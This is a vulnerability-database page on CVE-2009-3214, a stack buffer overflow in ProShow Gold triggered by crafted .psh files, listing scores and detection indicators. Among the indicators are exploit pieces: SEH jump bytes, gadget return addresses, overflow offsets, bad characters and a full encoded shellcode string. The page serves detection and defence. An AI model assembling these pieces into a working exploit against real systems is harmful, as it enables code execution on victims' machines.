cbcvebase.
CVE-2009-3214
published 2009-09-16

CVE-2009-3214: Multiple stack-based buffer overflows in Photodex ProShow Gold 4.0.2549 allow remote attackers to execute arbitrary code via a crafted Slideshow project (.psh)…

PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.79%
98.0th percentile
Multiple stack-based buffer overflows in Photodex ProShow Gold 4.0.2549 allow remote attackers to execute arbitrary code via a crafted Slideshow project (.psh) file, related to the (1) cell[n].images[m].image and (2) cell[n].sound.file fields.

Affected

1 ranges
VendorProductVersion rangeFixed in
photodexproshow_gold

Detection & IOCsextracted from sources · hover to see the quote

filenameproshowsploit.psh
filenamemsf.psh
commandcell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg
bytes
\xeb\x18\x90\x90
bytes
\x01\xa6\x14\xea
bytes
\xEB\x06\x90\x90
bytes
\xf9\x4c\x1a\x10
bytes
0x101a4cf9
bytes
\xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a\x7b\xc3\x04\x6d
  • Malicious .psh files exploit the cell[n].images[m].image field with an oversized value (6120–6151 'A' bytes) to trigger a stack-based buffer overflow via SEH overwrite in ProShow Gold 4.0.2549
  • Detect .psh files where the cell[0].images[0].image field value length exceeds normal path lengths (e.g., >4000 bytes), indicating a buffer overflow attempt
  • The SEH overwrite exploit uses p/p/r gadget at 0x01a614ea (all.dnt) or 0x101a4cf9 (if.dnt) in ProShow Gold 4.0.2549; look for these return addresses on the stack during crash analysis
  • Bad characters for payload encoding in this exploit are null byte, newline, and carriage return (\x00\x0a\x0d); payloads in .psh files will not contain these bytes
  • The exploit file header magic string 'Photodex(R) ProShow(TM) Show File Version=0' combined with an abnormally long cell[0].images[0].image value is a strong indicator of a weaponized .psh file
  • ·The SEH overwrite offset differs between exploit variants: 6120 bytes of junk in the corelanc0d3r PoC vs. 6151 bytes in the hack4love variant, and 4036 bytes in the Metasploit module; the Metasploit module targets a different p/p/r gadget (0x101a4cf9 in if.dnt) vs. the standalone PoCs (0x01a614ea in all.dnt)
  • ·The Metasploit module uses EXITFUNC=process and DisablePayloadHandler=true by default, and requires the victim to manually open the crafted .psh file (no network vector)
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.